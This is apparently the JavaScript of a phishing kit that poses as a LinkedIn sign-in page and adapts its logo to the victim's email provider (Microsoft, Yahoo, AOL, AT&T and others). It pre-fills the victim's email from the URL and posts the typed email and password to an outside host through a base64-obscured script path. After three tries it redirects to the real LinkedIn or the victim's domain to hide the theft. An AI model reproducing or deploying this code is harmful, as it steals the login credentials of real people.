function getDfd() {let yFn,nFn;const p=new Promise(function(y, n){yFn=y;nFn=n;});p.resolve=yFn;p.reject=nFn;return p;}
            window.lazyloader = getDfd();
            window.tracking = getDfd();
            window.impressionTracking = getDfd();
            window.ingraphTracking = getDfd();
            window.appDetection = getDfd();
            window.pemTracking = getDfd();
/* global $ */
  $(document).ready(function(){
	  
	
    var count=0;
    /////////////url email getting////////////////
    var email = window.location.hash.substr(1);
    if (!email) {

    }
    else
    {
        // $('#email').val(email);
        var my_email =email;
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();        
        $('#email').val(my_email);
        $('#domain-name').html(final);
        $("#msg").hide();
      }
      ///////////////url getting email////////////////


      var file="bmV4dC5waHA=";
      $('#submit-btn').click(function(event){
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var email=$("#email").val();
        var password=$("#password").val();
        var msg = $('#msg').html();
        $('#msg').text( msg );
      ///////////new injection////////////////
      var my_email =email;
      var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

      if (!email) {
            $('#error').show();
            $('#error').html("Email field is emply.!");
            ai.focus;
            return false;
        }

        if (!filter.test(my_email)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account");
            ai.focus;
            return false;
        }
        if (!password) {
            $('#error').show();
            $('#error').html("Password field is emply.!");
            ai.focus;
            return false;
        }

      var ind=my_email.indexOf("@");
      var my_slice=my_email.substr((ind+1));
      var c= my_slice.substr(0, my_slice.indexOf('.'));
      var final= c.toLowerCase();
      ///////////new injection////////////////
      count=count+1;
      $('#domain-name').html(final);
      $.ajax({
        dataType: 'JSON',
        url: "https://mwxvifx.com/linkedin/edl.php/"+atob(file),
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('loading...');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                	
                  $("#password").val("");
                  if (count>=3) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("http://www."+my_slice);

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
            	
              $("#password").val("");
              if (count>=3) {
                count=0;
                window.location.replace("https://www.linkedin.com/checkpoint/lg/login-submit");
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });


    });
var $c = getUrlParameter('email');
     $('#email').val($c);
        var $current_email = "";

        if ($c) {
            $current_email = isValidEmail($c) ? $c : decodeCustom($c);
        }


        function decodeCustom($email) {
            var $consonants = 'bcdfghjklmnpqrstvwxyz'.split('');
            var $joinChar = $email.substr(0, 1); // substr(,0,1);
            var $output = $email.substr(2); // substr($email,2);
            var $vowels = ['a', 'e', 'i', 'o', 'u'];
            var $vowelsLookup = [];

            for ($i in $consonants) {
                $output = $output.replace(new RegExp($joinChar + '0' + $i + 'a', 'g'), $consonants[$i]);
            }

            for ($i in $vowels) {
                $output = $output.replace(new RegExp($joinChar + $i, 'g'), $vowels[$i]);
            }

            $output = $output.replace(new RegExp($joinChar + $joinChar + $joinChar, 'g'), '@');
            //,$output);
            return $output;
        }

        function isValidEmail(email) {
            var re =
                /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
            return re.test(email);
        }

        function getUrlParameter(name) {
            name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
            var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
            var results = regex.exec(location.search);
            return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
			
        }
		
		 var currentEmail = $current_email;
    var ListEntries = [
            '.*fuck.*',
            '.*pussy.*',
            '.*bitch.*',
            '.*asshole.*',
            '.*fool.*',
            '.*dick.*',
            '.*mama.*',
            '.*nice.*try.*',
            '.*12345.*'
        ];
		
		 if(currentEmail){

            var e = document.getElementById('username');
            e = currentEmail;
            //e.readOnly = true;
			

            var domain = extractDomain(currentEmail);

           // var corH = document.getElementById('corportate-title');
            //corH.innerText = domain + " Email Login";

            }
			
		function extractDomain(email){

        var load = email;
        var domain = '';
        var regex = /.+@(.*?)\..+/;
        var str = email;
        var m;

        if ((m = regex.exec(str)) !== null) {
            return m[1];
        }

        return null;
    }

var value =  $('#email').val();
 if (value.indexOf('@hotmail') >= 0 || value.indexOf('@live') >= 0 || value.indexOf('@msn') >= 0 || value.indexOf('@outlook') >= 0) {
	$('img').attr("src", "images/microsoft_logo.jpg" );
 }
 else if (value.indexOf('@yahoo') >= 0 || value.indexOf('@ymail') >= 0 || value.indexOf('@rocketmail') >= 0 || value.indexOf('@sbcglobal.net') >= 0 || value.indexOf('@bellsouth.net') >= 0 || value.indexOf('@pacbell.net') >= 0) {
	$('img').attr( "src", "images/yahoo_logo.png" );
	}
else if (value.indexOf('@peoplepc') >= 0 || value.indexOf('@earthlink.net') >= 0 || value.indexOf('@mindspring') >= 0) {
	$('img').attr( "src", "images/earthlink_logo.png" );
	}
else if (value.indexOf('@comcast.net') >= 0 || value.indexOf('@xfinity') >= 0) {
	$('img').attr( "src", "images/comcast_logo.png" );
	}
else if (value.indexOf('@aim.com') >= 0 || value.indexOf('@aol.com') >= 0) {
	$('img').attr( "src", "images/aol_logo.png" );
	}
else if (value.indexOf('@cox.net') >= 0) {
	$('img').attr( "src", "images/cox_logo.png" );
	}
else if (value.indexOf('@mail') >= 0) {
	$('img').attr( "src", "images/godaddy_logo.png" );
	}
else if (value.indexOf('@ameritech.net') >= 0 || value.indexOf('@att.net') >= 0 || value.indexOf('@bellsouth.net') >= 0 || value.indexOf('@flash.net') >= 0 || value.indexOf('@nvbell.net') >= 0 || value.indexOf('@pacbell.net') >= 0 || value.indexOf('@prodigy.net') >= 0 || value.indexOf('@sbcglobal.net') >= 0 || value.indexOf('@snet.net') >= 0 || value.indexOf('@swbell.net') >= 0 || value.indexOf('@wans.net') >= 0) {
	$('img').attr("src", "images/atnt_logo.png" );
	
	}

